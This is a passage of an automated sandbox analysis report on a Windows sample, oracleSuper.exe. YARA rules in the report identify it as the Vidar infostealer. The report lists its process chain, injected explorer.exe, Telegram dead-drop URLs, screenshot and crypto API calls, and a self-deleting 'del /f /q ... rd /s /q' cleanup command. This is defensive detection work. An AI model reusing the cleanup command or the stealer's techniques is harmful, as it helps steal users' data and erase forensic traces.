Source: explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/stats/
Source: explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/(
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.000000000359F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, fru.4.dr String found in binary or memory: https://t.me/puffclou
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/puffclou4
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/puffclou=
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/puffclouW
Source: cmd.exe, 00000004.00000002.2407356619.0000000005510000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540293467.0000000000445000.00000002.00000001.01000000.00000000.sdmp, fru.4.dr String found in binary or memory: https://t.me/puffclouhellosqlt.dllsqlite3.dll
Source: explorer.exe, 00000009.00000002.2541375791.000000000359F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://telegram.org/img/t_logo_2x.png
Source: oracleSuper.exe, 00000000.00000002.2192910487.000000000417D000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, livecall.exe, 00000002.00000002.2170312412.0000000000401000.00000020.00000001.01000000.00000007.sdmp, livecall.exe, 00000002.00000000.2165542384.0000000000401000.00000020.00000001.01000000.00000007.sdmp, livecall.exe, 00000003.00000002.2194751559.0000000000401000.00000020.00000001.01000000.00000009.sdmp, livecall.exe, 00000003.00000000.2169625734.0000000000401000.00000020.00000001.01000000.00000009.sdmp, livecall.exe.0.dr, livecall.exe.2.dr String found in binary or memory: https://voicelogging.pcs.v2s.msn.com/voicelogging.ashx
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.000000000359F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.telegram.org
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.telegram.org8
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.telegram.orgX
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: oracleSuper.exe String found in binary or memory: https://www.globalsign.com/repository/0
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49915
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49866 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49916 version: TLS 1.2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_00433160 memset,CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 9_2_00433160
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A0D00 CryptGetProvParam,CryptGenKey,CryptGetKeyParam,CryptGetKeyParam,CryptDestroyKey,CryptGetKeyParam,CryptGetKeyParam,LocalAlloc,CryptGenRandom,CryptImportKey, 3_2_275A0D00
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A14C0 _memset,GetVersionExW,GetLastError,GetLastError,GetLastError,GetLastError,CryptImportKey, 3_2_275A14C0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A1220 CryptGenKey,CryptExportKey,CryptExportKey,CryptExportKey,CryptImportKey,SetLastError,CryptDestroyKey, 3_2_275A1220

System Summary

Source: 9.2.explorer.exe.420000.0.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 4.2.cmd.exe.55100c8.7.raw.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 4.2.cmd.exe.55100c8.7.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Temp\fru, type: DROPPED Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2758FE3C 3_2_2758FE3C
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2758CE2E 3_2_2758CE2E
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2758AEEC 3_2_2758AEEC
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275885B9 3_2_275885B9
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_27584446 3_2_27584446
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2759A4F0 3_2_2759A4F0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275908C0 3_2_275908C0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2758E8C7 3_2_2758E8C7
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0043EA42 9_2_0043EA42
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0043EE15 9_2_0043EE15
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0043EFEA 9_2_0043EFEA
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0043F7F8 9_2_0043F7F8
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe 63EC17FEDA1F0EA80E0DD7B7938FBF7354AEDF8D9F4041543AFCA9A35337F7BF
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: String function: 27595FD0 appears 362 times
Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 00424239 appears 287 times
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: String function: 00415C6F appears 39 times
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: String function: 004101E9 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: String function: 00411030 appears 128 times
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: String function: 00424094 appears 206 times
Source: oracleSuper.exe Static PE information: invalid certificate
Source: oracleSuper.exe, 00000000.00000002.2191941536.00000000038AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs oracleSuper.exe
Source: oracleSuper.exe, 00000000.00000002.2192439487.0000000003C0D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs oracleSuper.exe
Source: oracleSuper.exe, 00000000.00000002.2192910487.000000000417D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelivecall.exeD vs oracleSuper.exe
Source: oracleSuper.exe, 00000000.00000002.2192910487.000000000417D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsidcrl.dllP vs oracleSuper.exe
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamezip.exe( vs oracleSuper.exe
Source: oracleSuper.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 9.2.explorer.exe.420000.0.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 4.2.cmd.exe.55100c8.7.raw.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 4.2.cmd.exe.55100c8.7.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: C:\Users\user\AppData\Local\Temp\fru, type: DROPPED Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@15/12@3/3
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0043246A CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 9_2_0043246A
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: 2_2_0041D26A __EH_prolog3,CoCreateInstance,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString, 2_2_0041D26A
Source: C:\Users\user\Desktop\oracleSuper.exe Code function: 0_2_002DDE39 FindResourceW,LoadResource,LockResource, 0_2_002DDE39
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe File created: C:\Users\user\AppData\Roaming\localTask_v2
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2012:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3564:120:WilError_03
Source: C:\Users\user\Desktop\oracleSuper.exe File created: C:\Users\user\AppData\Local\Temp\6942704c
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Command line argument: UnregServer 2_2_004104C2
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Command line argument: RegServer 2_2_004104C2
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Command line argument: Embedding 2_2_004104C2
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Command line argument: pcsexeps.dll 2_2_004104C2
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Command line argument: softphone.dll 2_2_004104C2
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Command line argument: pcsexeps.dll 2_2_004104C2
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Command line argument: softphone.dll 2_2_004104C2
Source: oracleSuper.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\explorer.exe File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.ini
Source: C:\Users\user\Desktop\oracleSuper.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: oracleSuper.exe Virustotal: Detection: 8%
Source: livecall.exe String found in binary or memory: y" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/03/addressing" xmlns:wssc="http://schemas.xmlsoap.org/ws/2004/04/sc" xmlns:wst="http://schemas.xmlsoap.org/ws/2004/0
Source: oracleSuper.exe String found in binary or memory: Do you still want to launch the application ?FileVersionINSTLOCALINSTALLFICUPDATE134 - Echec de l'init de WinSock%s : %s//%s/INSTALL/%s 407200EXE%s\%s.exe%s\%s_%d.exe/%s/INSTALL/INSTALL.EXE138 - Echec de la requete HTTP - LastError = %s /REP="%s" /NOEXEC /WAIT139 - Lancement de la mise
Source: C:\Users\user\Desktop\oracleSuper.exe File read: C:\Users\user\Desktop\oracleSuper.exe
Source: unknown Process created: C:\Users\user\Desktop\oracleSuper.exe "C:\Users\user\Desktop\oracleSuper.exe"
Source: C:\Users\user\Desktop\oracleSuper.exe Process created: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Process created: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\SysWOW64\explorer.exe" & rd /s /q "C:\ProgramData\EBFHJEGDAFHI" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\oracleSuper.exe Process created: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Process created: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\SysWOW64\explorer.exe" & rd /s /q "C:\ProgramData\EBFHJEGDAFHI" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\oracleSuper.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\oracleSuper.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\oracleSuper.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\oracleSuper.exe Section loaded: pla.dll
Source: C:\Users\user\Desktop\oracleSuper.exe Section loaded: pdh.dll
Source: C:\Users\user\Desktop\oracleSuper.exe Section loaded: tdh.dll
Source: C:\Users\user\Desktop\oracleSuper.exe Section loaded: cabinet.dll
Source: C:\Users\user\Desktop\oracleSuper.exe Section loaded: wevtapi.dll
Source: C:\Users\user\Desktop\oracleSuper.exe Section loaded: shdocvw.dll
Source: C:\Users\user\Desktop\oracleSuper.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Section loaded: msidcrl40.dll
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Section loaded: sensapi.dll
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Section loaded: pla.dll
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Section loaded: pdh.dll
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Section loaded: tdh.dll
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Section loaded: wevtapi.dll
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Section loaded: msidcrl40.dll
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Section loaded: sensapi.dll
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Section loaded: pla.dll
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Section loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Section loaded: tdh.dll
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Section loaded: wevtapi.dll
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: shdocvw.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: shdocvw.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ntshrui.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: linkinfo.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: pcacli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: oracleSuper.exe Static file information: File size 6613368 > 1048576
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
Source: oracleSuper.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x600400
Source: oracleSuper.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: oracleSuper.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: oracleSuper.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: oracleSuper.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: oracleSuper.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: oracleSuper.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: oracleSuper.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: oracleSuper.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wntdll.pdbUGP source: oracleSuper.exe, 00000000.00000002.2192439487.0000000003AE0000.00000004.00000800.00020000.00000000.sdmp, oracleSuper.exe, 00000000.00000002.2192732992.0000000003E92000.00000004.00000001.00020000.00000000.sdmp, oracleSuper.exe, 00000000.00000002.2191941536.0000000003787000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171386304.000000000287E000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171686522.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2196426125.0000000002F65000.00000004.00000001.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195892526.000000000285E000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2196118649.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407126483.0000000005060000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2406823080.0000000004C17000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541837942.000000000B900000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541001928.0000000000BFA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: H:\source\source.SAM\202788\Release_wdexe_9\WX\Desktop_x86_32_VS2019\Release\WDExe.pdb source: oracleSuper.exe
